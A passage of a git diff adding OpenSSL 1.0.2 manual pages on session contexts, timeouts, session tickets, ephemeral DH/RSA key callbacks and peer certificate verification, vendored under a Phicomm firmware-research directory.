+ int SSL_CTX_set_session_id_context(SSL_CTX *ctx, const unsigned char *sid_ctx,
+                                    unsigned int sid_ctx_len);
+ int SSL_set_session_id_context(SSL *ssl, const unsigned char *sid_ctx,
+                                unsigned int sid_ctx_len);
+
+=head1 DESCRIPTION
+
+SSL_CTX_set_session_id_context() sets the context B<sid_ctx> of length
+B<sid_ctx_len> within which a session can be reused for the B<ctx> object.
+
+SSL_set_session_id_context() sets the context B<sid_ctx> of length
+B<sid_ctx_len> within which a session can be reused for the B<ssl> object.
+
+=head1 NOTES
+
+Sessions are generated within a certain context. When exporting/importing
+sessions with B<i2d_SSL_SESSION>/B<d2i_SSL_SESSION> it would be possible,
+to re-import a session generated from another context (e.g. another
+application), which might lead to malfunctions. Therefore each application
+must set its own session id context B<sid_ctx> which is used to distinguish
+the contexts and is stored in exported sessions. The B<sid_ctx> can be
+any kind of binary data with a given length, it is therefore possible
+to use e.g. the name of the application and/or the hostname and/or service
+name ...
+
+The session id context becomes part of the session. The session id context
+is set by the SSL/TLS server. The SSL_CTX_set_session_id_context() and
+SSL_set_session_id_context() functions are therefore only useful on the
+server side.
+
+OpenSSL clients will check the session id context returned by the server
+when reusing a session.
+
+The maximum length of the B<sid_ctx> is limited to
+B<SSL_MAX_SSL_SESSION_ID_LENGTH>.
+
+=head1 WARNINGS
+
+If the session id context is not set on an SSL/TLS server and client
+certificates are used, stored sessions
+will not be reused but a fatal error will be flagged and the handshake
+will fail.
+
+If a server returns a different session id context to an OpenSSL client
+when reusing a session, an error will be flagged and the handshake will
+fail. OpenSSL servers will always return the correct session id context,
+as an OpenSSL server checks the session id context itself before reusing
+a session as described above.
+
+=head1 RETURN VALUES
+
+SSL_CTX_set_session_id_context() and SSL_set_session_id_context()
+return the following values:
+
+=over 4
+
+=item Z<>0
+
+The length B<sid_ctx_len> of the session id context B<sid_ctx> exceeded
+the maximum allowed length of B<SSL_MAX_SSL_SESSION_ID_LENGTH>. The error
+is logged to the error stack.
+
+=item Z<>1
+
+The operation succeeded.
+
+=back
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_ssl_version.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_ssl_version.pod
new file mode 100644
index 0000000..e254f96
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_ssl_version.pod
@@ -0,0 +1,61 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_set_ssl_version, SSL_set_ssl_method, SSL_get_ssl_method
+- choose a new TLS/SSL method
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ int SSL_CTX_set_ssl_version(SSL_CTX *ctx, const SSL_METHOD *method);
+ int SSL_set_ssl_method(SSL *s, const SSL_METHOD *method);
+ const SSL_METHOD *SSL_get_ssl_method(SSL *ssl);
+
+=head1 DESCRIPTION
+
+SSL_CTX_set_ssl_version() sets a new default TLS/SSL B<method> for SSL objects
+newly created from this B<ctx>. SSL objects already created with
+L<SSL_new(3)|SSL_new(3)> are not affected, except when
+L<SSL_clear(3)|SSL_clear(3)> is being called.
+
+SSL_set_ssl_method() sets a new TLS/SSL B<method> for a particular B<ssl>
+object. It may be reset, when SSL_clear() is called.
+
+SSL_get_ssl_method() returns a function pointer to the TLS/SSL method
+set in B<ssl>.
+
+=head1 NOTES
+
+The available B<method> choices are described in
+L<SSL_CTX_new(3)|SSL_CTX_new(3)>.
+
+When L<SSL_clear(3)|SSL_clear(3)> is called and no session is connected to
+an SSL object, the method of the SSL object is reset to the method currently
+set in the corresponding SSL_CTX object.
+
+=head1 RETURN VALUES
+
+The following return values can occur for SSL_CTX_set_ssl_version()
+and SSL_set_ssl_method():
+
+=over 4
+
+=item Z<>0
+
+The new choice failed, check the error stack to find out the reason.
+
+=item Z<>1
+
+The operation succeeded.
+
+=back
+
+=head1 SEE ALSO
+
+L<SSL_CTX_new(3)|SSL_CTX_new(3)>, L<SSL_new(3)|SSL_new(3)>,
+L<SSL_clear(3)|SSL_clear(3)>, L<ssl(3)|ssl(3)>,
+L<SSL_set_connect_state(3)|SSL_set_connect_state(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_timeout.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_timeout.pod
new file mode 100644
index 0000000..e3de27c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_timeout.pod
@@ -0,0 +1,59 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_set_timeout, SSL_CTX_get_timeout - manipulate timeout values for session caching
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ long SSL_CTX_set_timeout(SSL_CTX *ctx, long t);
+ long SSL_CTX_get_timeout(SSL_CTX *ctx);
+
+=head1 DESCRIPTION
+
+SSL_CTX_set_timeout() sets the timeout for newly created sessions for
+B<ctx> to B<t>. The timeout value B<t> must be given in seconds.
+
+SSL_CTX_get_timeout() returns the currently set timeout value for B<ctx>.
+
+=head1 NOTES
+
+Whenever a new session is created, it is assigned a maximum lifetime. This
+lifetime is specified by storing the creation time of the session and the
+timeout value valid at this time. If the actual time is later than creation
+time plus timeout, the session is not reused.
+
+Due to this realization, all sessions behave according to the timeout value
+valid at the time of the session negotiation. Changes of the timeout value
+do not affect already established sessions.
+
+The expiration time of a single session can be modified using the
+L<SSL_SESSION_get_time(3)|SSL_SESSION_get_time(3)> family of functions.
+
+Expired sessions are removed from the internal session cache, whenever
+L<SSL_CTX_flush_sessions(3)|SSL_CTX_flush_sessions(3)> is called, either
+directly by the application or automatically (see
+L<SSL_CTX_set_session_cache_mode(3)|SSL_CTX_set_session_cache_mode(3)>)
+
+The default value for session timeout is decided on a per protocol
+basis, see L<SSL_get_default_timeout(3)|SSL_get_default_timeout(3)>.
+All currently supported protocols have the same default timeout value
+of 300 seconds.
+
+=head1 RETURN VALUES
+
+SSL_CTX_set_timeout() returns the previously set timeout value.
+
+SSL_CTX_get_timeout() returns the currently set timeout value.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>,
+L<SSL_CTX_set_session_cache_mode(3)|SSL_CTX_set_session_cache_mode(3)>,
+L<SSL_SESSION_get_time(3)|SSL_SESSION_get_time(3)>,
+L<SSL_CTX_flush_sessions(3)|SSL_CTX_flush_sessions(3)>,
+L<SSL_get_default_timeout(3)|SSL_get_default_timeout(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_tlsext_ticket_key_cb.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_tlsext_ticket_key_cb.pod
new file mode 100644
index 0000000..da0dd0f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_tlsext_ticket_key_cb.pod
@@ -0,0 +1,195 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_set_tlsext_ticket_key_cb - set a callback for session ticket processing
+
+=head1 SYNOPSIS
+
+ #include <openssl/tls1.h>
+
+ long SSL_CTX_set_tlsext_ticket_key_cb(SSL_CTX sslctx,
+        int (*cb)(SSL *s, unsigned char key_name[16],
+	          unsigned char iv[EVP_MAX_IV_LENGTH],
+		  EVP_CIPHER_CTX *ctx, HMAC_CTX *hctx, int enc));
+
+=head1 DESCRIPTION
+
+SSL_CTX_set_tlsext_ticket_key_cb() sets a callback fuction I<cb> for handling 
+session tickets for the ssl context I<sslctx>. Session tickets, defined in 
+RFC5077 provide an enhanced session resumption capability where the server
+implementation is not required to maintain per session state. It only applies
+to TLS and there is no SSLv3 implementation.
+
+The callback is available when the OpenSSL library was built without 
+I<OPENSSL_NO_TLSEXT> being defined.
+
+The callback function I<cb> will be called for every client instigated TLS
+session when session ticket extension is presented in the TLS hello
+message. It is the responsibility of this function to create or retrieve the
+cryptographic parameters and to maintain their state.
+
+The OpenSSL library uses your callback function to help implement a common TLS 
+ticket construction state according to RFC5077 Section 4 such that per session
+state is unnecessary and a small set of cryptographic variables needs to be 
+maintained by the callback function implementation.
+
+In order to reuse a session, a TLS client must send the a session ticket
+extension to the server. The client can only send exactly one session ticket.
+The server, through the callback function, either agrees to reuse the session
+ticket information or it starts a full TLS handshake to create a new session
+ticket.
+
+Before the callback function is started I<ctx> and I<hctx> have been 
+initialised with EVP_CIPHER_CTX_init and HMAC_CTX_init respectively.
+
+For new sessions tickets, when the client doesn't present a session ticket, or
+an attempted retreival of the ticket failed, or a renew option was indicated,
+the callback function will be called with I<enc> equal to 1. The OpenSSL
+library expects that the function will set an arbitary I<name>, initialize
+I<iv>, and set the cipher context I<ctx> and the hash context I<hctx>.
+
+The I<name> is 16 characters long and is used as a key identifier.
+
+The I<iv> length is the length of the IV of the corresponding cipher. The
+maximum IV length is L<EVP_MAX_IV_LENGTH> bytes defined in B<evp.h>.
+
+The initialization vector I<iv> should be a random value. The cipher context 
+I<ctx> should use the initialisation vector I<iv>. The cipher context can be 
+set using L<EVP_EncryptInit_ex>. The hmac context can be set using L<HMAC_Init_ex>.
+
+When the client presents a session ticket, the callback function with be called 
+with I<enc> set to 0 indicating that the I<cb> function should retreive a set
+of parameters. In this case I<name> and I<iv> have already been parsed out of
+the session ticket. The OpenSSL library expects that the I<name> will be used
+to retrieve a cryptographic parameters and that the cryptographic context
+I<ctx> will be set with the retreived parameters and the initialization vector
+I<iv>. using a function like L<EVP_DecryptInit_ex>. The I<hctx> needs to be set
+using L<HMAC_Init_ex>.
+
+If the I<name> is still valid but a renewal of the ticket is required the
+callback function should return 2. The library will call the callback again
+with an arguement of enc equal to 1 to set the new ticket.
+
+The return value of the I<cb> function is used by OpenSSL to determine what
+further processing will occur. The following return values have meaning:
+
+=over 4
+
+=item Z<>2
+
+This indicates that the I<ctx> and I<hctx> have been set and the session can 
+continue on those parameters. Additionally it indicates that the session
+ticket is in a renewal period and should be replaced. The OpenSSL library will
+call I<cb> again with an enc argument of 1 to set the new ticket (see RFC5077
+3.3 paragraph 2).
+
+=item Z<>1
+
+This indicates that the I<ctx> and I<hctx> have been set and the session can 
+continue on those parameters.
+
+=item Z<>0
+
+This indicates that it was not possible to set/retrieve a session ticket and 
+the SSL/TLS session will continue by by negiotationing a set of cryptographic
+parameters or using the alternate SSL/TLS resumption mechanism, session ids.
+
+If called with enc equal to 0 the library will call the I<cb> again to get
+a new set of parameters.
+
+=item less than 0
+
+This indicates an error.
+
+=back
+
+=head1 NOTES
+
+Session resumption shortcuts the TLS so that the client certificate
+negiotation don't occur. It makes up for this by storing client certificate
+an all other negotiated state information encrypted within the ticket. In a
+resumed session the applications will have all this state information available
+exactly as if a full negiotation had occured.
+
+If an attacker can obtain the key used to encrypt a session ticket, they can
+obtain the master secret for any ticket using that key and decrypt any traffic
+using that session: even if the ciphersuite supports forward secrecy. As
+a result applications may wish to use multiple keys and avoid using long term
+keys stored in files.
+
+Applications can use longer keys to maintain a consistent level of security.
+For example if a ciphersuite uses 256 bit ciphers but only a 128 bit ticket key
+the overall security is only 128 bits because breaking the ticket key will
+enable an attacker to obtain the session keys.
+
+=head1 EXAMPLES
+
+Reference Implemention:
+  SSL_CTX_set_tlsext_ticket_key_cb(SSL,ssl_tlsext_ticket_key_cb);
+  ....
+
+  static int ssl_tlsext_ticket_key_cb(SSL *s, unsigned char key_name[16], unsigned char *iv, EVP_CIPHER_CTX *ctx, HMAC_CTX *hctx, int enc)
+  {
+      if (enc) { /* create new session */
+          if (RAND_bytes(iv, EVP_MAX_IV_LENGTH) ) {
+              return -1; /* insufficient random */
+          }
+  
+          key = currentkey(); /* something that you need to implement */
+          if ( !key ) {
+              /* current key doesn't exist or isn't valid */
+              key = createkey(); /* something that you need to implement.
+                                   * createkey needs to initialise, a name,
+                                   * an aes_key, a hmac_key and optionally
+                                   * an expire time. */
+              if ( !key ) { /* key couldn't be created */
+                  return 0;
+              }
+          }
+          memcpy(key_name, key->name, 16);
+  
+          EVP_EncryptInit_ex(&ctx, EVP_aes_128_cbc(), NULL, key->aes_key, iv);
+          HMAC_Init_ex(&hctx, key->hmac_key, 16, EVP_sha256(), NULL);
+  
+          return 1;
+  
+      } else { /* retrieve session */
+          key = findkey(name);
+  
+          if  (!key || key->expire < now() ) {
+              return 0;
+          }
+  
+          HMAC_Init_ex(&hctx, key->hmac_key, 16, EVP_sha256(), NULL);
+          EVP_DecryptInit_ex(&ctx, EVP_aes_128_cbc(), NULL, key->aes_key, iv );
+
+          if (key->expire < ( now() - RENEW_TIME ) ) {
+              /* return 2 - this session will get a new ticket even though the current is still valid */
+              return 2;
+          }
+          return 1;
+  
+      }
+  }
+
+
+
+=head1 RETURN VALUES
+
+returns 0 to indicate the callback function was set.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_set_session(3)|SSL_set_session(3)>,
+L<SSL_session_reused(3)|SSL_session_reused(3)>,
+L<SSL_CTX_add_session(3)|SSL_CTX_add_session(3)>,
+L<SSL_CTX_sess_number(3)|SSL_CTX_sess_number(3)>,
+L<SSL_CTX_sess_set_get_cb(3)|SSL_CTX_sess_set_get_cb(3)>,
+L<SSL_CTX_set_session_id_context(3)|SSL_CTX_set_session_id_context(3)>,
+
+=head1 HISTORY
+
+This function was introduced in OpenSSL 0.9.8h
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_tmp_dh_callback.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_tmp_dh_callback.pod
new file mode 100644
index 0000000..7a27eef
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_tmp_dh_callback.pod
@@ -0,0 +1,169 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_set_tmp_dh_callback, SSL_CTX_set_tmp_dh, SSL_set_tmp_dh_callback, SSL_set_tmp_dh - handle DH keys for ephemeral key exchange
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ void SSL_CTX_set_tmp_dh_callback(SSL_CTX *ctx,
+            DH *(*tmp_dh_callback)(SSL *ssl, int is_export, int keylength));
+ long SSL_CTX_set_tmp_dh(SSL_CTX *ctx, DH *dh);
+
+ void SSL_set_tmp_dh_callback(SSL *ctx,
+            DH *(*tmp_dh_callback)(SSL *ssl, int is_export, int keylength));
+ long SSL_set_tmp_dh(SSL *ssl, DH *dh)
+
+=head1 DESCRIPTION
+
+SSL_CTX_set_tmp_dh_callback() sets the callback function for B<ctx> to be
+used when a DH parameters are required to B<tmp_dh_callback>.
+The callback is inherited by all B<ssl> objects created from B<ctx>.
+
+SSL_CTX_set_tmp_dh() sets DH parameters to be used to be B<dh>.
+The key is inherited by all B<ssl> objects created from B<ctx>.
+
+SSL_set_tmp_dh_callback() sets the callback only for B<ssl>.
+
+SSL_set_tmp_dh() sets the parameters only for B<ssl>.
+
+These functions apply to SSL/TLS servers only.
+
+=head1 NOTES
+
+When using a cipher with RSA authentication, an ephemeral DH key exchange
+can take place. Ciphers with DSA keys always use ephemeral DH keys as well.
+In these cases, the session data are negotiated using the
+ephemeral/temporary DH key and the key supplied and certified
+by the certificate chain is only used for signing.
+Anonymous ciphers (without a permanent server key) also use ephemeral DH keys.
+
+Using ephemeral DH key exchange yields forward secrecy, as the connection
+can only be decrypted, when the DH key is known. By generating a temporary
+DH key inside the server application that is lost when the application
+is left, it becomes impossible for an attacker to decrypt past sessions,
+even if he gets hold of the normal (certified) key, as this key was
+only used for signing.
+
+In order to perform a DH key exchange the server must use a DH group
+(DH parameters) and generate a DH key.
+The server will always generate a new DH key during the negotiation
+if either the DH parameters are supplied via callback or the
+SSL_OP_SINGLE_DH_USE option of SSL_CTX_set_options(3) is set (or both).
+It will  immediately create a DH key if DH parameters are supplied via
+SSL_CTX_set_tmp_dh() and SSL_OP_SINGLE_DH_USE is not set.
+In this case,
+it may happen that a key is generated on initialization without later
+being needed, while on the other hand the computer time during the
+negotiation is being saved.
+
+If "strong" primes were used to generate the DH parameters, it is not strictly
+necessary to generate a new key for each handshake but it does improve forward
+secrecy. If it is not assured, that "strong" primes were used (see especially
+the section about DSA parameters below), SSL_OP_SINGLE_DH_USE must be used
+in order to prevent small subgroup attacks. Always using SSL_OP_SINGLE_DH_USE
+has an impact on the computer time needed during negotiation, but it is not
+very large, so application authors/users should consider to always enable
+this option.
+
+As generating DH parameters is extremely time consuming, an application
+should not generate the parameters on the fly but supply the parameters.
+DH parameters can be reused, as the actual key is newly generated during
+the negotiation. The risk in reusing DH parameters is that an attacker
+may specialize on a very often used DH group. Applications should therefore
+generate their own DH parameters during the installation process using the
+openssl L<dhparam(1)|dhparam(1)> application. In order to reduce the computer
+time needed for this generation, it is possible to use DSA parameters
+instead (see L<dhparam(1)|dhparam(1)>), but in this case SSL_OP_SINGLE_DH_USE
+is mandatory.
+
+Application authors may compile in DH parameters. Files dh512.pem,
+dh1024.pem, dh2048.pem, and dh4096.pem in the 'apps' directory of current
+version of the OpenSSL distribution contain the 'SKIP' DH parameters,
+which use safe primes and were generated verifiably pseudo-randomly.
+These files can be converted into C code using the B<-C> option of the
+L<dhparam(1)|dhparam(1)> application.
+Authors may also generate their own set of parameters using
+L<dhparam(1)|dhparam(1)>, but a user may not be sure how the parameters were
+generated. The generation of DH parameters during installation is therefore
+recommended.
+
+An application may either directly specify the DH parameters or
+can supply the DH parameters via a callback function. The callback approach
+has the advantage, that the callback may supply DH parameters for different
+key lengths.
+
+The B<tmp_dh_callback> is called with the B<keylength> needed and
+the B<is_export> information. The B<is_export> flag is set, when the
+ephemeral DH key exchange is performed with an export cipher.
+
+=head1 EXAMPLES
+
+Handle DH parameters for key lengths of 512 and 1024 bits. (Error handling
+partly left out.)
+
+ ...
+ /* Set up ephemeral DH stuff */
+ DH *dh_512 = NULL;
+ DH *dh_1024 = NULL;
+ FILE *paramfile;
+
+ ...
+ /* "openssl dhparam -out dh_param_512.pem -2 512" */
+ paramfile = fopen("dh_param_512.pem", "r");
+ if (paramfile) {
+   dh_512 = PEM_read_DHparams(paramfile, NULL, NULL, NULL);
+   fclose(paramfile);
+ }
+ /* "openssl dhparam -out dh_param_1024.pem -2 1024" */
+ paramfile = fopen("dh_param_1024.pem", "r");
+ if (paramfile) {
+   dh_1024 = PEM_read_DHparams(paramfile, NULL, NULL, NULL);
+   fclose(paramfile);
+ }
+ ...
+
+ /* "openssl dhparam -C -2 512" etc... */
+ DH *get_dh512() { ... }
+ DH *get_dh1024() { ... }
+
+ DH *tmp_dh_callback(SSL *s, int is_export, int keylength)
+ {
+    DH *dh_tmp=NULL;
+
+    switch (keylength) {
+    case 512:
+      if (!dh_512)
+        dh_512 = get_dh512();
+      dh_tmp = dh_512;
+      break;
+    case 1024:
+      if (!dh_1024)
+        dh_1024 = get_dh1024();
+      dh_tmp = dh_1024;
+      break;
+    default:
+      /* Generating a key on the fly is very costly, so use what is there */
+      setup_dh_parameters_like_above();
+    }
+    return(dh_tmp);
+ }
+
+=head1 RETURN VALUES
+
+SSL_CTX_set_tmp_dh_callback() and SSL_set_tmp_dh_callback() do not return
+diagnostic output.
+
+SSL_CTX_set_tmp_dh() and SSL_set_tmp_dh() do return 1 on success and 0
+on failure. Check the error queue to find out the reason of failure.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_CTX_set_cipher_list(3)|SSL_CTX_set_cipher_list(3)>,
+L<SSL_CTX_set_tmp_rsa_callback(3)|SSL_CTX_set_tmp_rsa_callback(3)>,
+L<SSL_CTX_set_options(3)|SSL_CTX_set_options(3)>,
+L<ciphers(1)|ciphers(1)>, L<dhparam(1)|dhparam(1)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_tmp_rsa_callback.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_tmp_rsa_callback.pod
new file mode 100644
index 0000000..94c55b8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_tmp_rsa_callback.pod
@@ -0,0 +1,159 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_set_tmp_rsa_callback, SSL_CTX_set_tmp_rsa, SSL_CTX_need_tmp_rsa, SSL_set_tmp_rsa_callback, SSL_set_tmp_rsa, SSL_need_tmp_rsa - handle RSA keys for ephemeral key exchange
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ void SSL_CTX_set_tmp_rsa_callback(SSL_CTX *ctx,
+            RSA *(*tmp_rsa_callback)(SSL *ssl, int is_export, int keylength));
+ long SSL_CTX_set_tmp_rsa(SSL_CTX *ctx, RSA *rsa);
+ long SSL_CTX_need_tmp_rsa(SSL_CTX *ctx);
+
+ void SSL_set_tmp_rsa_callback(SSL_CTX *ctx,
+            RSA *(*tmp_rsa_callback)(SSL *ssl, int is_export, int keylength));
+ long SSL_set_tmp_rsa(SSL *ssl, RSA *rsa)
+ long SSL_need_tmp_rsa(SSL *ssl)
+
+ RSA *(*tmp_rsa_callback)(SSL *ssl, int is_export, int keylength);
+
+=head1 DESCRIPTION
+
+SSL_CTX_set_tmp_rsa_callback() sets the callback function for B<ctx> to be
+used when a temporary/ephemeral RSA key is required to B<tmp_rsa_callback>.
+The callback is inherited by all SSL objects newly created from B<ctx>
+with <SSL_new(3)|SSL_new(3)>. Already created SSL objects are not affected.
+
+SSL_CTX_set_tmp_rsa() sets the temporary/ephemeral RSA key to be used to be
+B<rsa>. The key is inherited by all SSL objects newly created from B<ctx>
+with <SSL_new(3)|SSL_new(3)>. Already created SSL objects are not affected.
+
+SSL_CTX_need_tmp_rsa() returns 1, if a temporary/ephemeral RSA key is needed
+for RSA-based strength-limited 'exportable' ciphersuites because a RSA key
+with a keysize larger than 512 bits is installed.
+
+SSL_set_tmp_rsa_callback() sets the callback only for B<ssl>.
+
+SSL_set_tmp_rsa() sets the key only for B<ssl>.
+
+SSL_need_tmp_rsa() returns 1, if a temporary/ephemeral RSA key is needed,
+for RSA-based strength-limited 'exportable' ciphersuites because a RSA key
+with a keysize larger than 512 bits is installed.
+
+These functions apply to SSL/TLS servers only.
+
+=head1 NOTES
+
+When using a cipher with RSA authentication, an ephemeral RSA key exchange
+can take place. In this case the session data are negotiated using the
+ephemeral/temporary RSA key and the RSA key supplied and certified
+by the certificate chain is only used for signing.
+
+Under previous export restrictions, ciphers with RSA keys shorter (512 bits)
+than the usual key length of 1024 bits were created. To use these ciphers
+with RSA keys of usual length, an ephemeral key exchange must be performed,
+as the normal (certified) key cannot be directly used.
+
+Using ephemeral RSA key exchange yields forward secrecy, as the connection
+can only be decrypted, when the RSA key is known. By generating a temporary
+RSA key inside the server application that is lost when the application
+is left, it becomes impossible for an attacker to decrypt past sessions,
+even if he gets hold of the normal (certified) RSA key, as this key was
+used for signing only. The downside is that creating a RSA key is
+computationally expensive.
+
+Additionally, the use of ephemeral RSA key exchange is only allowed in
+the TLS standard, when the RSA key can be used for signing only, that is
+for export ciphers. Using ephemeral RSA key exchange for other purposes
+violates the standard and can break interoperability with clients.
+It is therefore strongly recommended to not use ephemeral RSA key
+exchange and use DHE (Ephemeral Diffie-Hellman) key exchange instead
+in order to achieve forward secrecy (see
+L<SSL_CTX_set_tmp_dh_callback(3)|SSL_CTX_set_tmp_dh_callback(3)>).
+
+An application may either directly specify the key or can supply the key via a
+callback function. The callback approach has the advantage, that the callback
+may generate the key only in case it is actually needed. As the generation of a
+RSA key is however costly, it will lead to a significant delay in the handshake
+procedure.  Another advantage of the callback function is that it can supply
+keys of different size while the explicit setting of the key is only useful for
+key size of 512 bits to satisfy the export restricted ciphers and does give
+away key length if a longer key would be allowed.
+
+The B<tmp_rsa_callback> is called with the B<keylength> needed and
+the B<is_export> information. The B<is_export> flag is set, when the
+ephemeral RSA key exchange is performed with an export cipher.
+
+=head1 EXAMPLES
+
+Generate temporary RSA keys to prepare ephemeral RSA key exchange. As the
+generation of a RSA key costs a lot of computer time, they saved for later
+reuse. For demonstration purposes, two keys for 512 bits and 1024 bits
+respectively are generated.
+
+ ...
+ /* Set up ephemeral RSA stuff */
+ RSA *rsa_512 = NULL;
+ RSA *rsa_1024 = NULL;
+
+ rsa_512 = RSA_generate_key(512,RSA_F4,NULL,NULL);
+ if (rsa_512 == NULL)
+     evaluate_error_queue();
+
+ rsa_1024 = RSA_generate_key(1024,RSA_F4,NULL,NULL);
+ if (rsa_1024 == NULL)
+   evaluate_error_queue();
+
+ ...
+
+ RSA *tmp_rsa_callback(SSL *s, int is_export, int keylength)
+ {
+    RSA *rsa_tmp=NULL;
+
+    switch (keylength) {
+    case 512:
+      if (rsa_512)
+        rsa_tmp = rsa_512;
+      else { /* generate on the fly, should not happen in this example */
+        rsa_tmp = RSA_generate_key(keylength,RSA_F4,NULL,NULL);
+        rsa_512 = rsa_tmp; /* Remember for later reuse */
+      }
+      break;
+    case 1024:
+      if (rsa_1024)
+        rsa_tmp=rsa_1024;
+      else
+        should_not_happen_in_this_example();
+      break;
+    default:
+      /* Generating a key on the fly is very costly, so use what is there */
+      if (rsa_1024)
+        rsa_tmp=rsa_1024;
+      else
+        rsa_tmp=rsa_512; /* Use at least a shorter key */
+    }
+    return(rsa_tmp);
+ }
+
+=head1 RETURN VALUES
+
+SSL_CTX_set_tmp_rsa_callback() and SSL_set_tmp_rsa_callback() do not return
+diagnostic output.
+
+SSL_CTX_set_tmp_rsa() and SSL_set_tmp_rsa() do return 1 on success and 0
+on failure. Check the error queue to find out the reason of failure.
+
+SSL_CTX_need_tmp_rsa() and SSL_need_tmp_rsa() return 1 if a temporary
+RSA key is needed and 0 otherwise.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_CTX_set_cipher_list(3)|SSL_CTX_set_cipher_list(3)>,
+L<SSL_CTX_set_options(3)|SSL_CTX_set_options(3)>,
+L<SSL_CTX_set_tmp_dh_callback(3)|SSL_CTX_set_tmp_dh_callback(3)>,
+L<SSL_new(3)|SSL_new(3)>, L<ciphers(1)|ciphers(1)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_verify.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_verify.pod
new file mode 100644
index 0000000..b6ba6bb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_set_verify.pod
@@ -0,0 +1,294 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_set_verify, SSL_set_verify, SSL_CTX_set_verify_depth, SSL_set_verify_depth - set peer certificate verification parameters
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ void SSL_CTX_set_verify(SSL_CTX *ctx, int mode,
+                         int (*verify_callback)(int, X509_STORE_CTX *));
+ void SSL_set_verify(SSL *s, int mode,
+                     int (*verify_callback)(int, X509_STORE_CTX *));
+ void SSL_CTX_set_verify_depth(SSL_CTX *ctx,int depth);
+ void SSL_set_verify_depth(SSL *s, int depth);
+
+ int verify_callback(int preverify_ok, X509_STORE_CTX *x509_ctx);
+
+=head1 DESCRIPTION
+
+SSL_CTX_set_verify() sets the verification flags for B<ctx> to be B<mode> and
+specifies the B<verify_callback> function to be used. If no callback function
+shall be specified, the NULL pointer can be used for B<verify_callback>.
+
+SSL_set_verify() sets the verification flags for B<ssl> to be B<mode> and
+specifies the B<verify_callback> function to be used. If no callback function
+shall be specified, the NULL pointer can be used for B<verify_callback>. In
+this case last B<verify_callback> set specifically for this B<ssl> remains. If
+no special B<callback> was set before, the default callback for the underlying
+B<ctx> is used, that was valid at the time B<ssl> was created with
+L<SSL_new(3)|SSL_new(3)>.
+
+SSL_CTX_set_verify_depth() sets the maximum B<depth> for the certificate chain
+verification that shall be allowed for B<ctx>. (See the BUGS section.)
+
+SSL_set_verify_depth() sets the maximum B<depth> for the certificate chain
+verification that shall be allowed for B<ssl>. (See the BUGS section.)
+
+=head1 NOTES
+
+The verification of certificates can be controlled by a set of logically
+or'ed B<mode> flags:
+
+=over 4
+
+=item SSL_VERIFY_NONE
+
+B<Server mode:> the server will not send a client certificate request to the
+client, so the client will not send a certificate.
+
+B<Client mode:> if not using an anonymous cipher (by default disabled), the
+server will send a certificate which will be checked. The result of the
+certificate verification process can be checked after the TLS/SSL handshake
+using the L<SSL_get_verify_result(3)|SSL_get_verify_result(3)> function.
+The handshake will be continued regardless of the verification result.
+
+=item SSL_VERIFY_PEER
+
+B<Server mode:> the server sends a client certificate request to the client.
+The certificate returned (if any) is checked. If the verification process
+fails, the TLS/SSL handshake is
+immediately terminated with an alert message containing the reason for
+the verification failure.
+The behaviour can be controlled by the additional
+SSL_VERIFY_FAIL_IF_NO_PEER_CERT and SSL_VERIFY_CLIENT_ONCE flags.
+
+B<Client mode:> the server certificate is verified. If the verification process
+fails, the TLS/SSL handshake is
+immediately terminated with an alert message containing the reason for
+the verification failure. If no server certificate is sent, because an
+anonymous cipher is used, SSL_VERIFY_PEER is ignored.
+
+=item SSL_VERIFY_FAIL_IF_NO_PEER_CERT
+
